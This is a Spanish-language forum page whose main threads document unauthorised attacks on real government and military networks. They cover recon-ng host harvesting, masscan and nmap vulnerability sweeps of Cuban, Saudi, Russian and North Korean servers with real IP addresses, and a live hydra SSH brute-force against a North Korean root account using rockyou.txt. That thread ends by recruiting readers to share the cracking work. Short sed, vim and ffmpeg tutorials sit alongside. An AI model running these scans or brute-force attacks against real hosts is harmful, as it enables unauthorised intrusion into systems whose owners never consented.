Welcome, Guest
You have to register before you can post on our site.

Username
  

Password
  





Search Forums

(Advanced Search)

Forum Statistics
» Members: 2
» Latest member: anonimo
» Forum threads: 22
» Forum posts: 22

Full Statistics

Online Users
There are currently 2 online users.
» 0 Member(s) | 2 Guest(s)

Latest Threads
ubicaciones físicas,recon...
Forum: Cuba
Last Post: anonimo
12-26-2024, 02:59 AM
» Replies: 0
» Views: 90
sed
Forum: Otros comandos
Last Post: truper
12-25-2024, 08:56 PM
» Replies: 0
» Views: 87
Nmap script vuln a Corea ...
Forum: Corea del Norte
Last Post: anonimo
12-17-2024, 04:21 PM
» Replies: 0
» Views: 62
Ataque de fuerza bruta a ...
Forum: Corea del Norte
Last Post: anonimo
12-16-2024, 05:26 PM
» Replies: 0
» Views: 101
Masscan y Nmap a ips de z...
Forum: Rusia
Last Post: anonimo
12-15-2024, 03:41 AM
» Replies: 0
» Views: 69
Masscan y Nmap al Gobiern...
Forum: Arabia Saudita
Last Post: anonimo
12-12-2024, 01:35 AM
» Replies: 0
» Views: 75
Descubrimiento hosts gube...
Forum: Arabia Saudita
Last Post: anonimo
12-09-2024, 09:33 PM
» Replies: 0
» Views: 111
Vim y expresiones regular...
Forum: Otros comandos
Last Post: anonimo
12-09-2024, 12:55 AM
» Replies: 0
» Views: 67
ffmpeg
Forum: Conversión de audio y vídeo
Last Post: truper
12-08-2024, 02:13 AM
» Replies: 0
» Views: 77
Scan servidores gubername...
Forum: Turkmenistán
Last Post: anonimo
12-06-2024, 09:26 PM
» Replies: 0
» Views: 67

 
  ubicaciones físicas,recon-ng,nmap,nmap vuln
Posted by: anonimo - 12-26-2024, 02:59 AM - Forum: Cuba - No Replies

Puedes ver una versión wiki de éste post en https://wiki.acosadores.net/doku.php?id=...-nmap-vuln

1º mediante google con gov site:.as y otras búsquedas nos hacemos con las urls del gobierno

2º Crear un fichero sin las https:// ni http:// ni www ni la / final

3º Lo guardamos como cu.txt


recon-ng: Es una herramienta de recolección de información con una interfaz similar a metasploit

recon-ng

[recon-ng][default] > workspaces create cuba

back

back (salimos)

Creamos script.sh



Code:
#! /bin/bash

# Crea el archivo commands
echo "workspaces load cuba" > commands
echo "modules load recon/domains-hosts/hackertarget" >> commands

# Iterar sobre cada dominio en cu.txt
while read domain; do
  echo "options set SOURCE $domain" >> commands
  echo "run" >> commands
done < cu.txt


chmod +x script.sh


./script.sh



recon-ng -r /home/usuario/archivos/cuba/commands (tiene que ser ruta completa, no puede ser ruta relativa porque da error)


Volcamos el resultado en un fichero (porque el resultado no entra en el buffer de la pantalla y no se puede copiar)


spool start /home/usuario/cuba/volcado.txt


[*]Spooling output to '/home/usuario/cuba/volcado.txt'.

a partir de ahora todos los resultados de los comandos se guardarán en el fichero volcado.txt

ponemos:

[recon-ng][cuba] > show hosts

[recon-ng][cuba] > spool stop

[*]Spooling stopped. Output saved to '/home/usuario/cuba/volcado.txt'.
[recon-ng][cuba] >

En volcado.txt si hacemos:

cat volcado.txt | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' | wc -l
170
[*]
Pero no son todos esos hosts porque hay algunos dominios o subdominios apuntando a mismas ips

Si hacemos:
cat volcado.txt | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' | sort | uniq | wc -l
[*]88


cat volcado.txt | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' | sort | uniq > ips_medios_cu.txt







[*]
[*]Ubicaciones Físicas
[*]
[*]Creamos ubicaciones_medios_cu.sh







Code:
#! /bin/bash


# Iterar sobre cada ip en ips_medios_cu.txt
while read ip; do
  echo "$(mmdblookup --file ../GeoLite2-City.mmdb --ip $ip | grep -oE '[0-9]{1,3}\.[0-9]{6}' | tr '\n' ',' | sed 's/,$/\n/')" >> ubicaciones_hosts_gobierno_cu.txt
done < ips_medios_cu.txt
[*]
[*]chmod +x ubicaciones_medios_cu.sh

[*]./ubicaciones_medios_cu.sh


cat ubicaciones_hosts_gobierno_cu.txt | sort | uniq | wc -l
7
Los 88 hosts se encuentran todos en tan sólo 7 ubicaciones, (datacenters tal vez)

cat ubicaciones_hosts_gobierno_cu.txt | sort | uniq > datacenters_cu.txt

Ahora importando ubicaciones_hosts_gobierno_cu.txt en qgis se pueden ver en el mapa
   

[*]hacemos nmap a esos 88 hosts
nmap -F -sS -iL ips_medios_cu.txt -oA nmap_ips_gobierno_cu


de esos 88 host hacemos un scan de vulnerabilidades sólo a los que esten up

nmap --script=vuln $(cat nmap_ips_gobierno_cu.nmap | grep -B 1 'Host is up' | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}') -oA nmap_vuln_hosts_cu



Attached Files
.gz   ubicaciones_nmap_vuln_recon-ng_cu.tar.gz (Size: 36.06 KB / Downloads: 1)
Print this item

  sed
Posted by: truper - 12-25-2024, 08:56 PM - Forum: Otros comandos - No Replies

Puedes ver una versión wiki de éste post en https://wiki.acosadores.net/doku.php?id=comandos:sed
Tutorial Sed


Autor/es: foro.acosadores.net


En éste tutorial trataremos de entender la parte más difícil y menos explicada de éste comando, si alguien puede y quiere explicarlo mejor que lo haga




El espacio de patrón y de retención, muy difícil de comprender sin explicarlo muy bien



sed@command:~$ cat lineas.txt

una

dos

tres

cuatro

cinco

seis

siete

ocho

nueve

diez

sed@command:~$




sed@command:~$ cat lineas2.txt (tiene un espacio al final de la última línea)
una
dos
tres
cuatro
cinco
seis
siete
ocho
nueve
diez

sed@command:~$

sed@command:~$ cat lineas.txt | sed '/./{H;d};x;' (como la condición /./ siempre se cumple nunca llega a ejecutar x y por eso no imprime nada
sed@command:~$
sed@command:~$ cat lineas2.txt | sed '/./{H;d};x;' (como el archivo al final contiene una línea en blanco /./ deja de cumplirse, pasa a la instrucción x y por eso imprime

una
dos
tres
cuatro
cinco
seis
siete
ocho
nueve
diez
sed@command:~$

El comando podría leerse algo así, if /./ { do{H;d}while(no linea en blanco);x }

Mientras la línea contiene algo ejecuta {H;d} (añade la línea del espacio de patron al de retención y la borra del espacio de patrón), y cuando no (la línea ultima en blanco) ejecuta x (intercambia las líneas almacenadas en el espacio de retención a patrón) y por eso las imprime todas


Etiquetas condicionales
si la línea coincide con el patron cuatro salta a la etiqueta z y sólo sustituye u por chu, sino sustituye u por mu y luego u por chu

sed@command:~$ sed '/cuatro/bz;s/u/mu/;:z;s/u/chu/' lineas.txt
mchuna
dos
tres
cchuatro
cinco
seis
siete
ocho
nmchueve
diez
sed@command:~$

Condicionales fáciles
-nE (imprime sólo lo que coincide y habilita el uso de expresiones regulares sin tener que escapar los caracteres con \)


sed@command:~$ sed -nE '/^.{4}$/p' lineas.txt (líneas que sólo tengan 4 caracteres)
tres
seis
ocho
diez
sed@command:~$ sed -nE '/^.{4}$/{n;p}' lineas.txt (n salta a la siguiente línea y p imprime)
cuatro
siete
nueve
once once
sed@command:~$ sed -nE '/^.{4}$/{n;n;p}' lineas.txt (salta 2 líneas e imprime)
cinco
ocho
sed@command:~$

Print this item

  Nmap script vuln a Corea del Norte
Posted by: anonimo - 12-17-2024, 04:21 PM - Forum: Corea del Norte - No Replies

Puedes ver una versión wiki de éste post en https://wiki.acosadores.net/doku.php?id=...cript-vuln

Extraemos sólo los hosts que están activos del escaner nmap del primer post Tutorial

cat resultado.txt | grep -B 1 'Host is up' | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}'
175.45.176.21
175.45.176.22
175.45.176.68
175.45.176.69
175.45.176.71
175.45.176.72
175.45.176.75
175.45.176.76
175.45.176.80
175.45.176.81
175.45.176.85
175.45.176.91
175.45.177.1
175.45.177.10
175.45.177.11
175.45.178.129
175.45.178.134
175.45.178.138

Buscamos vulnerabilidades en esos hosts con nmap

nmap --script=vuln $(cat resultado.txt | grep -B 1 'Host is up' | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}') -oA nmap_vuln_hosts_kp

Se muestran 2 vulnerabilidades en 4 hosts, se ven más fácil con:


cat nmap_vuln_hosts_kp.nmap | sed -n '/.*scan report for.*/,/^$/p' | sed -n '/./{H;d}; x; /VULNERABLE/!d; p'



Attached Files
.gz   nmap_vuln_hosts_kp.tar.gz (Size: 16.13 KB / Downloads: 2)
Print this item

  Ataque de fuerza bruta a host de Corea del Norte
Posted by: anonimo - 12-16-2024, 05:26 PM - Forum: Corea del Norte - No Replies

Puedes ver una versión wiki de éste post en https://wiki.acosadores.net/doku.php?id=...erza-bruta

Si leíste el post anterior Tutorial  entenderás mejor éste post

Code:
hydra@kp:~$ mmdblookup --file Descargas/maxmind/GeoLite2-City.mmdb --ip 175.45.178.129

  {
    "continent":
      {
        "code":
          "AS" <utf8_string>
        "geoname_id":
          6255147 <uint32>
        "names":
          {
            "de":
              "Asien" <utf8_string>
            "en":
              "Asia" <utf8_string>
            "es":
              "Asia" <utf8_string>
            "fr":
              "Asie" <utf8_string>
            "ja":
              "アジア" <utf8_string>
            "pt-BR":
              "Ásia" <utf8_string>
            "ru":
              "Азия" <utf8_string>
            "zh-CN":
              "亚洲" <utf8_string>
          }
      }
    "country":
      {
        "geoname_id":
          1873107 <uint32>
        "iso_code":
          "KP" <utf8_string>
        "names":
          {
            "de":
              "Nordkorea" <utf8_string>
            "en":
              "North Korea" <utf8_string>
            "es":
              "Corea del Norte" <utf8_string>
            "fr":
              "Corée du Nord" <utf8_string>
            "ja":
              "韓国、朝鮮民主主義人民共和国" <utf8_string>
            "pt-BR":
              "Coreia do Norte" <utf8_string>
            "ru":
              "КНДР" <utf8_string>
            "zh-CN":
              "朝鲜" <utf8_string>
          }
      }
    "location":
      {
        "accuracy_radius":
          50 <uint16>
        "latitude":
          40.000000 <double>
        "longitude":
          127.000000 <double>
        "time_zone":
          "Asia/Pyongyang" <utf8_string>
      }
    "registered_country":
      {
        "geoname_id":
          1873107 <uint32>
        "iso_code":
          "KP" <utf8_string>
        "names":
          {
            "de":
              "Nordkorea" <utf8_string>
            "en":
              "North Korea" <utf8_string>
            "es":
              "Corea del Norte" <utf8_string>
            "fr":
              "Corée du Nord" <utf8_string>
            "ja":
              "韓国、朝鮮民主主義人民共和国" <utf8_string>
            "pt-BR":
              "Coreia do Norte" <utf8_string>
            "ru":
              "КНДР" <utf8_string>
            "zh-CN":
              "朝鲜" <utf8_string>
          }
      }
  }

hydra@kp:~$ mmdblookup --file Descargas/maxmind/GeoLite2-City.mmdb --ip 175.45.178.129 | grep -oE '[0-9]{1,3}\.[0-9]{6}'
40.000000
127.000000

   

El host físico se encuentra a 2.15 km de la carretera más cercana

hydra@kp:~$ ssh root@175.45.178.129
Unable to negotiate with 175.45.178.129 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
hydra@kp:~$


Para poder establecer la conexión debemos especificar el uso de un algoritmo antiguo

hydra@kp:~$ ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa -o KexAlgorithms=+diffie-hellman-group14-sha1 -o Ciphers=+aes128-cbc,3des-cbc,aes192-cbc,aes256-cbc root@175.45.178.129

(root@175.45.178.129) Password: 
(root@175.45.178.129) Password:
(root@175.45.178.129) Password:
root@175.45.178.129's password:
Connection closed by 175.45.178.129 port 22

Como vemos no pide clave de autenticación para que sólo pueda conectarse un cliente reconocido, por lo que cualquiera puede hacer un ataque de fuerza. Permite 4 intentos máximos y se cierra la conexión, lo típico y normal, pero como veremos más adelante ésto se lo salta hydra




hydra@kp:~$ ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa -o KexAlgorithms=+diffie-hellman-group14-sha1 -o Ciphers=+aes128-cbc,3des-cbc,aes192-cbc,aes256-cbc corea@175.45.178.129
(corea@175.45.178.129) Password:
(corea@175.45.178.129) Password:

tambien un usuario corea?

Damos ctrl + c

hydra@kp:~$ ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa -o KexAlgorithms=+diffie-hellman-group14-sha1 -o Ciphers=+aes128-cbc,3des-cbc,aes192-cbc,aes256-cbc kp@175.45.178.129
(kp@175.45.178.129) Password:


kp?
Damos ctrl +c

hydra@kp:~$ ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa -o KexAlgorithms=+diffie-hellman-group14-sha1 -o Ciphers=+aes128-cbc,3des-cbc,aes192-cbc,aes256-cbc nhzx@175.45.178.129

(nhzx@175.45.178.129) Password:

Podemos observar que el servidor pide contraseña aún no existiendo el nombre de usuario (como en todas las distribuciones Gnu/Linux), ésto va a dificultar el ataque de fuerza bruta porque no podemos deducir cual es. Una opción es usar rockyou.txt para el login y también para el password. pero como lo normal es tener un usuario root no nos vamos a complicar

En hydra no es necesario especificar ningún algoritmo para establecer la comunicación

Descargamos rockyou.txt con wget https://github.com/brannondorsey/naive-h...ockyou.txt


hydra -l root -P Descargas/rockyou.txt ssh://175.45.178.129
Hydra v9.2 © 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-16 17:06:36
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://175.45.178.129:22/
[STATUS] 449.00 tries/min, 449 tries in 00:01h, 14343982 to do in 532:27h, 16 active

[STATUS] 214.67 tries/min, 644 tries in 00:03h, 14343787 to do in 1113:39h, 16 active
[STATUS] 196.57 tries/min, 1376 tries in 00:07h, 14343055 to do in 1216:07h, 16 active
[STATUS] 204.33 tries/min, 3065 tries in 00:15h, 14341366 to do in 1169:47h, 16 active
[STATUS] 227.48 tries/min, 7052 tries in 00:31h, 14337379 to do in 1050:26h, 16 active
[STATUS] 216.09 tries/min, 10156 tries in 00:47h, 14334275 to do in 1105:37h, 16 active

Lo mismo pero utilizando también rockyou.txt como diccionario para login

hydra@kp:~$ hydra -l Descargas/rockyou.txt -P Descargas/rockyou.txt ssh://175.45.178.129
Hydra v9.2 © 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-16 18:54:16
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://175.45.178.129:22/
[STATUS] 569.00 tries/min, 569 tries in 00:01h, 14343862 to do in 420:09h, 16 active
[STATUS] 394.00 tries/min, 1182 tries in 00:03h, 14343249 to do in 606:45h, 16 active

Como vemos funciona y se salta el límite de los 4 intentos cuando intentamos acceder de forma manual.

Sería más rápido, eficiente e interesante unir fuerzas dividiendo el fichero rockyou.txt en varias partes y que entre todos sacasemos el password y el user

Print this item

  Masscan y Nmap a ips de zonas militares
Posted by: anonimo - 12-15-2024, 03:41 AM - Forum: Rusia - No Replies

Puedes ver una versión wiki de éste post en https://wiki.acosadores.net/doku.php?id=...-militares

Si leíste el post anterior Ips de zonas militares podrás entender como se obtiene el fichero areas_con_ips.txt (zonas militares con ips asignadas)

Escaneamos los puertos más comunes

sudo masscan --ports 80,22,443,110,995,143,993,3306,2082,2083,25,2095,2096,2077,2078 --rate 10000 -iL areas_con_ips.txt -oJ masscan_areas_con_ips.json

cat masscan_areas_con_ips.json | grep open

{  "ip": "79.174.36.70",  "timestamp": "1734231736", "ports": [ {"port": 443, "proto": "tcp", "status": "open", "reason": "syn-ack", "ttl": 48} ] }
{  "ip": "79.174.36.220",  "timestamp": "1734231736", "ports": [ {"port": 22, "proto": "tcp", "status": "open", "reason": "syn-ack", "ttl": 48} ] }


mmdblookup --file ../GeoLite2-City.mmdb --ip 79.174.36.70 | grep -oE '[0-9]{1,3}\.[0-9]{6}'
55.687700
37.197100


mmdblookup --file ../GeoLite2-City.mmdb --ip 79.174.36.220 | grep -oE '[0-9]{1,3}\.[0-9]{6}'
55.687700
37.197100


Vemos que las 2 ips pertenecen a la misma zona militar

   

creamos un fichero hosts_areas.txt con esas 2 ips

sudo nmap -F -sS -iL hosts_areas.txt -oA nmap_areas_con_hosts_ru

Starting Nmap 7.80 ( https://nmap.org ) at 2024-12-15 04:08 CET
Nmap scan report for 79.174.36.70
Host is up (0.16s latency).
Not shown: 96 filtered ports
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
443/tcp  open  https
1723/tcp open  pptp

Nmap scan report for 79.174.36.220
Host is up (0.17s latency).
Not shown: 95 filtered ports
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
80/tcp  open  http
443/tcp  open  https
3306/tcp open  mysql

Nmap done: 2 IP addresses (2 hosts up) scanned in 11.98 seconds



Attached Files
.gz   masscan_nmap_areas_militares_ru.tar.gz (Size: 45.44 KB / Downloads: 1)
Print this item

  Masscan y Nmap al Gobierno Saudí
Posted by: anonimo - 12-12-2024, 01:35 AM - Forum: Arabia Saudita - No Replies

Puedes ver una versión wiki de éste post en https://wiki.acosadores.net/doku.php?id=...l-gobierno

Si leíste el post anterior Descubrimiento hosts gubernamentales con recon-ng entenderás de donde sale el fichero ips_servidores_gobierno_as.txt

No hace falta que hagas el escaner, puedes descargar el fichero que se adjunta en éste post y empezar a probar, pero eso solo si no estás leyendo éste post años después.

sudo masscan --ports 1-65535 --rate 10000 -iL ips_servidores_gobierno_as.txt -oJ masscan_ips_servidores_gobierno_as.json


Hacemos más legible el resultado:

cat masscan_ips_servidores_gobierno_as.json | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}|port": [0-9]+' | sed '/^[0-9]/ {N; s/\n/ /}' | sed 's/port"/open port/g' > masscan_ip_open_port.txt

Obtenemos una lista única sin repetir los puertos para hacernos una idea general de servicios abiertos:

cat masscan_ip_open_port.txt | grep -oE '[0-9]+$' | sort -n | uniq

Preguntamos a una inteligencia artificial a que corresponden esos puertos, nos dice ésto:

Puertos comunes:

  • 110: POP3 (Post Office Protocol 3) - Protocolo de correo para recibir correos electrónicos.
  • 111: Portmap (RPCbind) - Usado para permitir que otros servicios utilicen el protocolo RPC (Remote Procedure Call).
  • 443: HTTPS (Hypertext Transfer Protocol Secure) - Protocolo para navegación segura en la web.
  • 80: HTTP (Hypertext Transfer Protocol) - Protocolo estándar de transferencia de hipertexto.
  • 3306: MySQL - Usado por el sistema de gestión de bases de datos MySQL.
  • 5432: PostgreSQL - Usado por el sistema de gestión de bases de datos PostgreSQL.
  • 22: SSH (Secure Shell) - Protocolo para acceso remoto seguro.
  • 21: FTP (File Transfer Protocol) - Protocolo para la transferencia de archivos.
Puertos menos comunes y específicos:
  • 1080: SOCKS Proxy - Usado para tráfico proxy, particularmente en conexiones ocultas.
  • 5353: mDNS (Multicast DNS) - Usado por el protocolo de resolución de nombres de dispositivos en redes locales.
  • 3389: RDP (Remote Desktop Protocol) - Protocolo de acceso remoto a escritorios de Windows.
  • 8080: HTTP Alternativo - Usado generalmente para servidores web o proxies alternativos.
  • 27017: MongoDB - Usado por el sistema de base de datos NoSQL MongoDB.
Puertos de servicios específicos:
  • 10663: Puede estar asociado a algún servicio propietario o aplicación.
  • 12032, 12109, 12143, 12165: No están asociados a servicios comunes, y podrían ser utilizados por aplicaciones específicas o servicios personalizados.
  • 23951: Este puerto podría ser usado para alguna aplicación propietaria o poco común.

No satisfechos probamos también con nmap, en modo rápido y sigiloso, más lento que masscan pero más preciso

sudo nmap -F -sS -iL ips_servidores_gobierno_as.txt -oA nmap_ips_gobierno_as

cat nmap_ips_gobierno_as.nmap | grep open | grep -oE '^[0-9]+' | sort -n | uniq | wc -l

99

cat masscan_ip_open_port.txt | grep -oE '[0-9]+$' | sort -n | uniq | wc -l

265

Tal vez esos de más de masscan sean falsos positivos, por lo general nmap es bastante preciso

Obtenemos una lista única sin repetir los puertos de Nmap para hacernos una idea general:

cat nmap_ips_gobierno_as.nmap | grep open | sed 's/ \+open \+/ open /g' | sort | uniq | sed '$d' | sed '$d'
10000/tcp open snet-sensor-mgmt
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1028/tcp open unknown
1029/tcp open ms-lsa
106/tcp open pop3pw
110/tcp open pop3
1110/tcp open nfsd-status
111/tcp open rpcbind
113/tcp open ident
119/tcp open nntp
135/tcp open msrpc
13/tcp open daytime
1433/tcp open ms-sql-s
143/tcp open imap
144/tcp open news
1720/tcp open h323q931
1723/tcp open pptp
1755/tcp open wms
179/tcp open bgp
1900/tcp open upnp
199/tcp open smux
2000/tcp open cisco-sccp
2001/tcp open dc
2049/tcp open nfs
2121/tcp open ccproxy-ftp
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
26/tcp open rsftp
2717/tcp open pn-requester
3000/tcp open ppp
3128/tcp open squid-http
32768/tcp open filenet-tms
3306/tcp open mysql
3389/tcp open ms-wbt-server
37/tcp open time
389/tcp open ldap
3986/tcp open mapper-ws_ethd
427/tcp open svrloc
443/tcp open https
444/tcp open snpp
445/tcp open microsoft-ds
465/tcp open smtps
4899/tcp open radmin
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
5000/tcp open upnp
5009/tcp open airport-admin
5051/tcp open ida-agent
5060/tcp open sip
5101/tcp open admdog
513/tcp open login
514/tcp open shell
515/tcp open printer
5190/tcp open aol
5357/tcp open wsdapi
53/tcp open domain
5432/tcp open postgresql
543/tcp open klogin
544/tcp open kshell
548/tcp open afp
554/tcp open rtsp
5631/tcp open pcanywheredata
5666/tcp open nrpe
5800/tcp open vnc-http
587/tcp open submission
5900/tcp open vnc
6000/tcp open X11
6001/tcp open X11:1
631/tcp open ipp
646/tcp open ldp
6646/tcp open unknown
7070/tcp open realserver
79/tcp open finger
7/tcp open echo
8000/tcp open http-alt
8008/tcp open http
8009/tcp open ajp13
8080/tcp open http-proxy
8081/tcp open blackice-icecap
80/tcp open http
81/tcp open hosts2-ns
8443/tcp open https-alt
873/tcp open rsync
8888/tcp open sun-answerbook
88/tcp open kerberos-sec
9100/tcp open jetdirect
990/tcp open ftps
993/tcp open imaps
995/tcp open pop3s
9999/tcp open abyss
9/tcp open discard



Attached Files
.gz   masscan_nmap_as.tar.gz (Size: 38.12 KB / Downloads: 1)
Print this item

  Descubrimiento hosts gubernamentales con recon-ng
Posted by: anonimo - 12-09-2024, 09:33 PM - Forum: Arabia Saudita - No Replies

Puedes ver una versión wiki de éste post en https://wiki.acosadores.net/doku.php?id=...n-recon-ng

1º mediante google con gov site:.as y otras búsquedas nos hacemos con las urls del gobierno

2º Crear un fichero sin las https:// ni http:// ni www ni la / final

3º He creado medios.txt con unos 29 dominios saudíes




recon-ng: Es una herramienta de recolección de información con una interfaz similar a metasploit




recon-ng



[recon-ng][default] > workspaces create arabia_saudi




workspaces load arabia_saudi




[recon-ng][arabia_saudi] > marketplace install recon/domains-hosts/hackertarget




[recon-ng][arabia_saudi] > modules search







  Recon



  -----



    recon/domains-contacts/whois_pocs



    recon/domains-hosts/hackertarget




[recon-ng][arabia_saudi] > modules load recon/domains-hosts/hackertarget




[recon-ng][arabia_saudi][hackertarget] > options




Manages the current context options




Usage: options <list|set|unset> [...]




El módulo cargado lo que hará será intentar obtener todos los subdominios de los dominios o subdominios dados




[recon-ng][arabia_saudi][hackertarget] > options (si le das a tab salen los parámetros de options)




list  set    unset




[recon-ng][arabia_saudi][hackertarget] > options set SOURCE spa.gov.sa




SOURCE => spa.gov.sa




[recon-ng][arabia_saudi][hackertarget] > options list




Name    Current Value  Required  Description



  ------  -------------  --------  -----------



  SOURCE  spa.gov.sa    yes      source of input (see 'info' for details)




[recon-ng][arabia_saudi][hackertarget] > run (ejecuta el módulo cargado)




muestra subdominios con sus respectivas ips




Pero en en fichero medios.txt teníamos muchos dominios, no podemos ir de uno en uno, es mucho tiempo y repetir las mismas líneas muchas veces, para ello salimos de la interfaz con el comando back 2 veces y utilizamos la opción -r de recon-ng y le damos el fichero con los comandos, pero para crear el fichero con los comandos hay que hacer un script que repita los comandos que hemos puesto en la interfaz, veamos:






Code:
#! /bin/bash

# Crea el archivo commands
echo "workspaces load arabia_saudi" > commands
echo "modules load recon/domains-hosts/hackertarget" >> commands

# Iterar sobre cada dominio en medios.txt
while read domain; do
  echo "options set SOURCE $domain" >> commands
  echo "run" >> commands
done < medios.txt




le damos permisos de ejecución con chmod +x script.sh, ejecutamos con ./script.sh y crea el fichero commands




después hacemos:




recon-ng -r /home/usuario/archivos/arabia_saudi/commands (tiene que ser ruta completa, no puede ser ruta relativa porque da error)




Bien, ahora estamos en la interfaz, vemos que tarda un poco porque está haciendo bastantes cosas (lo que haríamos manualmente, repetir mucho)




Ahora de lo que nos damos cuenta es que al hacer desde el prompt




[recon-ng][arabia_saudi] > show hosts (no entra el resultado en el buffer de la terminal / consola)





Bien, para solucionarlo volcamos el resultado en un fichero haciendo lo siguiente:





spool start /home/usuario/arabia_saudi/volcado.txt



[*]Spooling output to '/home/usuario/arabia_saudi/volcado.txt'.

a partir de ahora todos los resultados de los comandos se guardarán en el fichero volcado.txt

ponemos:

[recon-ng][arabia_saudi] > show hosts

[recon-ng][arabia_saudi] > spool stop

[*]Spooling stopped. Output saved to '/home/usuario/arabia_saudi/volcado.txt'.
[recon-ng][arabia_saudi] >

En volcado.txt si hacemos:

cat volcado.txt | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' | wc -l
850
[*]
Pero no son todos esos hosts porque hay algunos dominios o subdominios apuntando a mismas ips

Si hacemos:
cat volcado.txt | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' | sort | uniq | wc -l
675

Ahí si que se obtiene el número total de hosts físicos. Tal vez pueda interesar donde están físicamente y de alguna manera dibujar un mapa de donde están. Si leíste los anteriores posts recordarás como obtener ubicaciones a partir de la base de datos GeoLite2-City, así que primero creamos un fichero con todas las ips y después un script que itere sobre cada una, se lo de al comando y éste vaya añadiendo la ubicación a un fichero


cat volcado.txt | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' | sort | uniq > ips_servidores_gobierno_sa.txt









Code:
#! /bin/bash


# Iterar sobre cada ip en ips_servidores_gobierno_sa.txt
while read ip; do
  echo "$(mmdblookup --file ../GeoLite2-City.mmdb --ip $ip | grep -oE '[0-9]{1,3}\.[0-9]{6}' | tr '\n' ',' | sed 's/,$/\n/')" >> ubicaciones_hosts_gobierno_as.txt
done < ips_servidores_gobierno_sa.txt
[*]

chmod +x coordenadas_ips_as.sh
./coordenadas_ips_as.sh

ahora ya tenemos las ubicaciones de los 675 servidores del gobierno y podemos usar por ejemplo qgis para verlas en el mapa

   

cat ubicaciones_hosts_gobierno_as.csv | sort | uniq
17.372400,78.437800
21.484900,39.192000
21.997400,79.001100
24.094900,38.062900
24.686900,46.722400
24.998600,44.989200
25.020600,37.264300
26.284600,50.208000
26.433600,50.111600
29.971300,40.202700
33.663700,117.174300
37.751000,97.822000
39.046900,77.490300
41.259100,95.851700
43.631900,79.371600
50.118700,8.684200
51.496400,0.122400
52.389100,4.656300

[*]Todos, los 666 están concentrados en 18 ubicaciones, y hay 9 que no tienen ninguna ubicación asignada



Attached Files
.gz   hosts_gobierno_as.tar.gz (Size: 15.12 KB / Downloads: 1)
Print this item

  Vim y expresiones regulares
Posted by: anonimo - 12-09-2024, 12:55 AM - Forum: Otros comandos - No Replies

Elimina https:// o http:// las www. y o la / final

%s/^\(http[s]\{0,1\}:\/\/\)\(\www\.\)\{0,1\}// | %s/\/$//

Para hacerlo más práctico editar .vimrc y poner:

command! LimpiarUrls %s/^\(http[s]\{0,1\}:\/\/\)\(\www\.\)\{0,1\}// | %s/\/$//

desde vim recargar la configuración

:source ~/.vimrc

para usarlo desde vim

:LimpiarUrls

Print this item

  ffmpeg
Posted by: truper - 12-08-2024, 02:13 AM - Forum: Conversión de audio y vídeo - No Replies

Puedes ver una versión wiki de éste post en https://wiki.acosadores.net/doku.php?id=comandos:ffmpeg

ffprobe video.mpg <------- dice qué codecs tiene y más detalles

Extraer una porción de vídeo sin convertir los códecs

ffmpeg -i 'video.mpg' -ss 00:00:02 -to 00:00:04 -c copy fragmento1.mpg

Extraer una porción de vídeo convirtiendo sólo el códec de audio a otro

ffmpeg -i 'video.mpg' -ss 00:00:02 -to 00:00:04 -c:v copy -c:a aac fragmento1.mpg

Extraer una porción de vídeco convirtiendo el códec de audio y vídeo

ffmpeg -i 'fragmento1.mpg' -ss 00:00:02 -to 00:00:04 -c:v libx264 -c:a aac fragmento1_.mkv

Para unir todas las partes que hemos extraído deben de tener todas los mismos códecs de audio, vídeo, contenedor (mkv,webm,etc) y tienen que tener los mismos canales de audio

lista.txt debe contener:
file 'parte1.mkv'
file 'parte2.mkv'
file 'parte3.mkv'


ffmpeg -f concat -i lista.txt -c copy video_final.mkv

si el vídeo se oye mal al unir las partes es posible que alguna parte esté en estéreo y las otras no, o viceversa, para arreglarlo se puede poner todas a estéreo o sólamente la parte que no lo está

ffmpeg -i parte1.mkv -ac 2 -c:v copy -c:a copy parte1_stereo.mkv

o

ffmpeg -i parte1.mkv -ac 1 -c:v copy -c:a copy parte1_mono.mkv

